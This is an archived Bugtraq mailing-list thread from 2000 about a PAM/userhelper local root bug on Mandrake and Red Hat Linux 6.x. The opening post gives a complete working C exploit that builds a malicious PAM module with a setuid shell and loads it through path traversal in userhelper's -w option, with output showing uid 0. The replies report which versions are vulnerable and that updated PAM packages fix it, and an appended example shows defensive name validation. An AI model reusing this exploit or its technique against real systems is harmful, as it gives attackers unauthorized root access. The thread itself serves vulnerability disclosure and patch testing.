4910853 2000-03-17  09:53  /60 lines/ Brevbäraren (som är implementerad i) Python
Recipient: Bugtraq (import) <10272>
Subject: Exploit for Mandrake 6.1 (PAM/userhelper bug)
------------------------------------------------------------
/*
 * pam-mdk.c (C) 2000 Paulo Ribeiro
 *
 * DESCRIPTION:
 * -----------
 * Mandrake Linux 6.1 has the same problem as Red Hat Linux 6.x but its
 * exploit (pamslam.sh) doesn't work on it (at least on my machine). So,
 * I created this C program based on it which exploits PAM/userhelper
 * and gives you UID 0.
 *
 * SYSTEMS TESTED:
 * --------------
 * Red Hat Linux 6.0, Red Hat Linux 6.1, Mandrake Linux 6.1.
 *
 * RESULTS:
 * -------
 * [prrar@linux prrar]$ id
 * uid=501(prrar) gid=501(prrar) groups=501(prrar)
 * [prrar@linux prrar]$ gcc pam-mdk.c -o pam-mdk
 * [prrar@linux prrar]$ ./pam-mdk
 * sh-2.03# id
 * uid=0(root) gid=501(prrar) groups=501(prrar)
 * sh-2.03#
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int main(int argc, char *argv[])
{
        FILE *fp;

        strcpy(argv[0], "vi test.txt");

        fp = fopen("abc.c", "a");
        fprintf(fp, "#include<stdlib.h>\n");
        fprintf(fp, "#include<unistd.h>\n");
        fprintf(fp, "#include<sys/types.h>\n");
        fprintf(fp, "void _init(void) {\n");
        fprintf(fp, "\tsetuid(geteuid());\n");
        fprintf(fp, "\tsystem(\"/bin/sh\");\n");
        fprintf(fp, "}");
        fclose(fp);

        system("echo -e auth\trequired\t$PWD/abc.so > abc.conf");
        system("chmod 755 abc.conf");
        system("gcc -fPIC -o abc.o -c abc.c");
        system("ld -shared -o abc.so abc.o");
        system("chmod 755 abc.so");
        system("/usr/sbin/userhelper -w ../../..$PWD/abc.conf");
        system("rm -rf abc.*");
}

/* pam-mdk.c: EOF */

___________________________________
Paulo Ribeiro	prrar@nitnet.com.br
(4910853) ------------------------------------------
Comment in text 4918771 by Brevbäraren (som är implementerad i) Python
Comment in text 4919435 by Brevbäraren (som är implementerad i) Python
Comment in text 4928480 by Brevbäraren (som är implementerad i) Python
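
The -w argument in the program above climbs out of the configuration directory with "../../.." so that a user-written file is read as PAM configuration. The check below shows how a setuid helper can refuse such names before it builds a path. It is an added example, not code from the original post and not the userhelper or PAM fix; the function names, the length bound and the use of /etc/pam.d/ as the base directory are assumptions.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define CONF_DIR "/etc/pam.d/"   /* assumed configuration directory */
#define NAME_MAX_LEN 64          /* assumed upper bound for a service name */

/* Return 1 if name is a plain file name that is safe to append to CONF_DIR. */
int service_name_ok(const char *name)
{
    size_t len;

    if (name == NULL)
        return 0;
    len = strlen(name);
    if (len == 0 || len > NAME_MAX_LEN)
        return 0;
    if (name[0] == '.')            /* rejects ".", ".." and hidden files */
        return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        /* allow-list: letters, digits, '-', '_', '.'; '/' is never accepted */
        if (!isalnum(c) && c != '-' && c != '_' && c != '.')
            return 0;
    }
    return 1;
}

/* Build CONF_DIR + name into out; return 0 on success, -1 on rejection. */
int build_conf_path(const char *name, char *out, size_t outlen)
{
    int n;

    if (!service_name_ok(name))
        return -1;
    n = snprintf(out, outlen, "%s%s", CONF_DIR, name);
    if (n < 0 || (size_t)n >= outlen)
        return -1;                 /* truncated: refuse rather than open */
    return 0;
}

int main(void)
{
    char path[128];
    /* constructed sample inputs: one ordinary name, one traversal attempt */
    const char *samples[] = { "passwd", "../../../home/user/abc.conf" };
    for (int i = 0; i < 2; i++)
        printf("%-30s -> %s\n", samples[i],
               build_conf_path(samples[i], path, sizeof path) == 0 ? path : "rejected");
    return 0;
}
```
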
4918771 2000-03-20  11:23  /36 lines/ Brevbäraren (som är implementerad i) Python
Recipient: Bugtraq (import) <10294>
Comment to text 4910853 by Brevbäraren (som är implementerad i) Python
Subject: Re: Exploit for Mandrake 6.1 (PAM/userhelper bug)
------------------------------------------------------------
on 3/14/00 5:14 PM, Paulo Ribeiro at prrar@NITNET.COM.BR wrote:

> * DESCRIPTION:
> * -----------
> * Mandrake Linux 6.1 has the same problem as Red Hat Linux 6.x but its
> * exploit (pamslam.sh) doesn't work on it (at least on my machine). So,
> * I created this C program based on it which exploits PAM/userhelper
> * and gives you UID 0.
> *
> * SYSTEMS TESTED:
> * --------------
> * Red Hat Linux 6.0, Red Hat Linux 6.1, Mandrake Linux 6.1.
> *
> * RESULTS:
> * -------
> * [prrar@linux prrar]$ id
> * uid=501(prrar) gid=501(prrar) groups=501(prrar)
> * [prrar@linux prrar]$ gcc pam-mdk.c -o pam-mdk
> * [prrar@linux prrar]$ ./pam-mdk
> * sh-2.03# id

It appears that Mandrake 6.0 is vulnerable too:

[darron@maul darron]$ gcc pam-mdk.c -o pam-mdk
[darron@maul darron]$ ./pam-mdk
sh-2.03# id
uid=0(root) gid=502(admin) groups=502(admin)
sh-2.03#
[darron@maul /etc]$ cat mandrake-release
Linux Mandrake release 6.0 (Venus)
--
Darron
darron@froese.org
<http://darron.froese.org/>
(4918771) ------------------------------------------
4919435 2000-03-20  13:23  /20 lines/ Brevbäraren (som är implementerad i) Python
Recipient: Bugtraq (import) <10303>
Comment to text 4910853 by Brevbäraren (som är implementerad i) Python
Subject: Re: Exploit for Mandrake 6.1 (PAM/userhelper bug)
------------------------------------------------------------
Tested systems..

Redhat 6.0 w/pam-0.68-10		- didn't work
Redhat 6.1 w/pam-0.68-7			- worked

Then on the same machine (having root and being the nice 'hacker' I
was, upgraded pam for him..  Then retested).

Redhat 6.1 w/pam-0.68-10		- didn't work

And that pam rpm is on the Redhat 6.1 update web site.

--
Matt Davis - ICQ# 934680
http://dogpound.vnet.net/
NoWonder UNIX Tech - http://www.nowonder.com

"!sgub evah t'nseod CP sihT ?sgub naem ayaddahW"
(4919435) ------------------------------------------(Rewrapped)
4928480 2000-03-22  09:14  /21 lines/ Brevbäraren (som är implementerad i) Python
Recipient: Bugtraq (import) <10337>
Comment to text 4910853 by Brevbäraren (som är implementerad i) Python
Subject: Re: Exploit for Mandrake 6.1 (PAM/userhelper bug)
------------------------------------------------------------
	I tried this on a couple of my Mandrake 6.1 machines and it did
work.  Tried it on a Mandrake 7.0 box and it didn't work.  I went to
the Mandrake FTP site and downloaded an RPM of 7.0's PAM,
installed it, and everything seems happy now.

<snip>
>  * Mandrake Linux 6.1 has the same problem as Red Hat Linux 6.x but its
>  * exploit (pamslam.sh) doesn't work on it (at least on my machine). So,
>  * I created this C program based on it which exploits PAM/userhelper
>  * and gives you UID 0.
<snip>
>  * Red Hat Linux 6.0, Red Hat Linux 6.1, Mandrake Linux 6.1.
>  *
<snip>


Jeremy Gault
Systems Administrator - WingNET Internet Services
http://www.wingnet.net
(4928480) ------------------------------------------